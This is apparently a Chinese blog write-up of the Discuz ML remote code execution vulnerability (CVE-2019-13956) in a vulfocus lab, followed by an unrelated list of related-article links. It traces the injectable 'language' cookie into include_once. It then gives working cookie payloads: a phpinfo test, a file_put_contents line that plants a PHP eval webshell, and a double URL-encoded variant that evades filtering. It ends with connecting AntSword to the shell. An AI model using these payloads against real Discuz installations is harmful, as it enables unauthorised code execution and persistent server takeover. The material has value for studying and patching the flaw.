漏洞介绍:

该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。

利用的vulnfocus 的环境。

漏洞分析:

漏洞出现在    /upload/source/module/portal/portal_index.php

include_once 对template()函数的返回对象进行了包含,如果包含的内容可控的话,就会存在命令执行。

跟进  template

这里返回的是 DISCUZ_ROOT . $cachefile ;

发现该函数返回了一个缓存文件,跟进缓存文件。

这个缓存的文件名$cachefile是由 discuz_lang 拼接而成的

$cachefile = './data/template/'.DISCUZ_LANG.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';

也就是说,我们能控制这个 discuz_LANG  就能rce

查看DISCUZ_LANG的值:

跟进$LNG

发现他是cookie 里的language获得的, 而cookie 可以在bp里修改。至此漏洞存在。

思路  $lng -> discuz_LANG 拼接成 $cachefile   而$cachefile 被include_once包含。

漏洞复现:

将  R4jx_2132_language=sc

修改为 : sc'.phpinfo().' 

至于为什么要 加这个 单引号,因为我们分析过,缓存文件名的组成是由:

'./data/template/'.DISCUZ_LANG.'_'

组成的。

所以我们加入后的语句就为:

'./data/temlpate/'.'sc'.phpinfo().''_'

这样就能成功执行phpinfo()

测试成功。

可以 试着往里面写个马

sc'.file_put_contents("shell.php","<?php eval($_POST[1]);?>").'

 发现 系统报错了,可能检测到了危险函数。把我们的一句话过滤掉了。

我们使用url编码绕过,将(POST , eval) 编码为url 的格式。

'.file_put_contents("shell.php",urldecode('%3C%3Fphp%20%65%76%61%6c%28%24_%50%4f%53%54%5Bcmd%5D%29%3B%3F%3E')).'

因为服务器会自动解码一次,所以我们要再次url 编码:

%27.file_put_contents%28%22shell.php%22%2Curldecode%28%27%253C%253Fphp%2520%2565%2576%2561%256c%2528%2524_%2550%254f%2553%2554%255Bcmd%255D%2529%253B%253F%253E%27%29%29.%27

传入cookie:

蚁剑连一下我们的shell.php 

Discuz远程代码执行(CVE-2019-13956)相关推荐

  1. Discuz! 7.1 7.2 远程代码执行漏洞

    首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xhming给了个poc,我给了个exp,确实 ...

  2. php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限

    此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...

  3. windows server 2012 远程连不上_CVE20201350 | Windows DNS Server远程代码执行漏洞通告

    0x00 漏洞概述 CVE   ID CVE-2020-1350 时     间 2020-07-15 类     型 RCE 等     级 严重 远程利用 是 影响范围 0x01 漏洞详情 微软于 ...

  4. CVE-2021-1675: Windows Print Spooler远程代码执行漏洞

    ** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日 ...

  5. CVE-2021-34527: Windows Print Spooler 蠕虫级远程代码执行漏洞

    报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-02 1 更新概览 1.漏洞简述新增360CERT对CVE-2021-34527( ...

  6. Microsoft Remote Procedure Call Runtime 远程代码执行漏洞(CVE-2022-26809)

    CVE-2022-26809 RCE CVE 描述 CVE-2022-26809 - 核心 Windows 组件 (RPC) 的弱点获得 9.8 的 CVSS 分数并非没有原因,因为攻击不需要身份验证 ...

  7. 绿盟安全事件响应观察及远程代码执行漏洞

    人和管理成为主要入侵突破口 安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件 中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不 ...

  8. 微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)

    漏洞描述 Internet Control Message Protocol (ICMP) 协议是TCP/IP协议簇的一个子协议,用于在IP主机.路由器之间传递控制消息.raw socket 是一种网 ...

  9. 微软远程桌面服务远程代码执行漏洞

    人和管理成为主要入侵突破口 安全需要人.技术.管理的全方位保障,然而人与管理由于其复杂性,常常成为入侵突破口.在 19 年处理的安全事件中,弱口令事件占比 22%,钓鱼邮件相关事件占比 7%,配置不当 ...

最新文章

  1. 不相交集类以及应用迷宫生成
  2. QApplicationQPushButton
  3. PCB Editor 布线后操作
  4. 爱上MVC~为非法进行Action的用户提供HttpStatusCodeResult
  5. 稀疏表示介绍(中)、(下)
  6. php sdk微信,GitHub - swayer/wechat-php-sdk: 微信公众平台 PHP SDK
  7. [深度学习-实践]条件生成对抗网络cGAN的例子-Tensorflow2.x Keras
  8. cdoj1342郭大侠与甲铁城
  9. Linux kali2021 密码学PBC库安装
  10. NotePad++ 正则表达式
  11. 系统维护模式修改/etc/fstab
  12. python模拟手机屏幕滑动_Python 封装Swipe实现手机屏幕滑动操作
  13. codewars练习(javascript)-2021/3/23
  14. iOS自定义身份证键盘
  15. 搭建美丽天天秒链动2+1OpenRApp开发
  16. 和外国人聊天的简化英语
  17. 【odoo15】由于目标计算机积极拒绝,无法连接。
  18. 阿里最受追捧的「中高级技术核心」,助我拿下菜网offer,附面经
  19. ASEMI整流桥ABS10、ABS210、DB107S详细参数对比
  20. 淘宝网和铁道部订票网站采用什么技术架构来实现网站高负载的呢

热门文章

  1. 机械加工行业MES解决方案,解决生产作业调度问题
  2. AppStore 关于账号授权
  3. Python画图2(八卦阵等)
  4. Meego针对Nokia N900/N950/N9社区版发布
  5. NokiaLogo Mobile版,仅供试用
  6. 【单片机毕业设计】【mcuclub-109】基于单片机的智能抽油烟机控制系统设计-标准版【仿真设计】
  7. 32核微型计算机,32核的怪兽,AMD第二代锐龙线程撕裂者评测汇总
  8. 一个实施工程师的自我修养
  9. 怎么查同一网络下的计算机,Windows下查看同局域网其它主机MAC地址
  10. Romberg求积分算法